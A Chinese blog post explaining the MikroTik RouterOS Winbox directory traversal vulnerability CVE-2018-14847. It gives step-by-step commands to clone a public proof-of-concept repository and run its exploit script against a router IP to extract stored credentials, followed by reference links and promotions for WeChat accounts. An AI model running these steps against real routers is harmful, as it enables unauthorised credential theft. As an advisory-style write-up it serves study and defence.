Winbox漏洞(CVE-2018-14847)深度剖析:MikroTik RouterOS的目录遍历与攻击实践
Winbox是一个小巧的实用程序,允许使用快速简单的GUI管理MikroTik RouterOS。它主要用于管理和配置MikroTik路由器。而RouterOS是由MikroTik开发的操作系统,运行在其路由器和交换机上。
·
漏洞概述
Winbox是一个小巧的实用程序,允许使用快速简单的GUI管理MikroTik RouterOS。它主要用于管理和配置MikroTik路由器。而RouterOS是由MikroTik开发的操作系统,运行在其路由器和交换机上。
CVE-2018-14847漏洞详情
MikroTik RouterOS 6.42及之前版本存在一个安全漏洞。由于Winbox接口中的目录遍历漏洞,未经认证的远程攻击者可以读取任意文件,而经过认证的远程攻击者可以写入任意文件。
漏洞利用原理
Winbox漏洞的工作原理是通过访问MikroTik设备上的user.dat文件,然后使用extract_user.py解密其中包含的密码,接着使用WinboxExploit.py脚本显示凭据。
漏洞利用步骤
以下是完整的漏洞利用流程:
# 克隆漏洞利用代码仓库
# git clone https://github.com/BasuCert/WinboxPoC
# 进入漏洞利用目录
# cd WinboxPoC
# 执行漏洞利用脚本,<ip router>替换为目标路由器IP地址
# python3 WinboxExploit.py <ip router>
# 实际使用示例
# python3 WinboxExploit.py 192.168.18.187
参考链接
- https://github.com/BasuCert/WinboxPoC
- https://www.bssn.go.id/wp-content/uploads/2018/10/Himbauan-CVE-2018-14847-v-1.1.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847FINISHED
CSD0tFqvECLokhw9aBeRqiFaxebtE89mqyjjzvCX5l27Vn7pcfQD0YOjtLcFRiVdOWo0uPhqxGGBRhtr5fvm1sX075BZOOgJeFLIduGVGkOjwAC2T+2Xdaycoy2kNqi2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
更多推荐

所有评论(0)